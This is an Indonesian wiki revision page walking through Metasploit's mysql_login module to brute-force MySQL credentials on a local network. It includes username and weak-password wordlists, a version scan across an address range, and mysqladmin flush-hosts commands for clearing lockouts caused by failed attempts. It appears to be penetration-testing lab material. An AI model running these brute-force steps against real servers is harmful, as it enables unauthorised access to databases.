Difference between revisions of "Kali Linux: MySQL Login"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 17: | Line 17: | ||
run | run | ||
+ | |||
+ | Jika terlalu banyak error saat mencoba, biasanya MySQL akan mengunci / me-lock akses kita. Kita dapat mem-flush lock yang ada di server MySQL menggunakan perintah | ||
+ | |||
+ | mysqladmin flush-hosts | ||
+ | mysqladmin -u <username-root> -p<password-root> flush-hosts | ||
+ | mysqladmin -u root -p123456 flush-hosts | ||
==Cek Versi== | ==Cek Versi== |
Revision as of 08:56, 15 February 2016
Sumber: https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/
Aktifkan metasploit
Masuk ke msfconsole
msfconsole thankyou
Hack Login
use auxiliary/scanner/mysql/mysql_login show options set PASS_FILE /tmp/passes.txt set RHOSTS 192.168.0.80 set USER_FILE /tmp/users.txt run
Jika terlalu banyak error saat mencoba, biasanya MySQL akan mengunci / me-lock akses kita. Kita dapat mem-flush lock yang ada di server MySQL menggunakan perintah
mysqladmin flush-hosts mysqladmin -u <username-root> -p<password-root> flush-hosts mysqladmin -u root -p123456 flush-hosts
Cek Versi
use auxiliary/scanner/mysql/mysql_version show options set RHOSTS 192.168.0.10-254 set THREADS 20 run
Siapkan passes.txt dan users.txt
Isi /tmp/passes.txt
12345 123456 1234567 12345678 123456789 secret password p@ssword moodle mediawiki toor s3cr3t
Isi /tmp/users.txt
moodle mediawiki admin root